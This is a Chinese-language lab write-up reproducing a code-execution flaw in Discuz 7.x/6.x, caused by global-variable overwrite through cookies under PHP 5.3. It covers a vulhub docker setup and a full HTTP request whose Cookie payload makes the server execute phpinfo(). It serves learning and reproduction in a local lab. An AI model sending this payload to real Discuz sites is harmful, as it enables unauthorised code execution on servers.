Discuz 7.x、6.x 全局变量防御绕过导致代码执行

0x01 分析

由于php5.3.x版本里php.ini的设置里request_order默认值为GP，导致${}_{R}EQUEST中不再包含$_COOKIE，我们通过在Cookie中传入$GLOBALS来覆盖全局变量，造成代码执行漏洞。

具体原理请参考：

https://www.secpulse.com/archives/2338.html

0x02 环境搭建

https://blog.csdn.net/qq_36374896/article/details/84102101

0x03 启动环境

1、执行如下命令启动Discuz 7.2：

cd vulhub-master/discuz/wooyun-2010-080723/
sudo docker-compose up -d

sudo docker ps

已经启动

2、安装discuz

启动后，访问http://your-ip:8080/install/来安装discuz，数据库地址填写db，数据库名为discuz，数据库账号密码均为root。

0x04 漏洞复现

安装成功后，直接找一个已存在的帖子，向其发送数据包，并在Cookie中增加

GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=phpinfo();：

GET /viewthread.php?tid=7&extra=page%3D1 HTTP/1.1
Host: 192.168.91.130:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Referer: http://192.168.91.130:8080/forumdisplay.php?fid=2
Connection: close
Cookie: GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=phpinfo();
Upgrade-Insecure-Requests: 1

可见，phpinfo已成功执行：

网上文章说需要一个带表情评论的帖子，实际测试发现并不需要，这块仍需阅读代码来解释原因。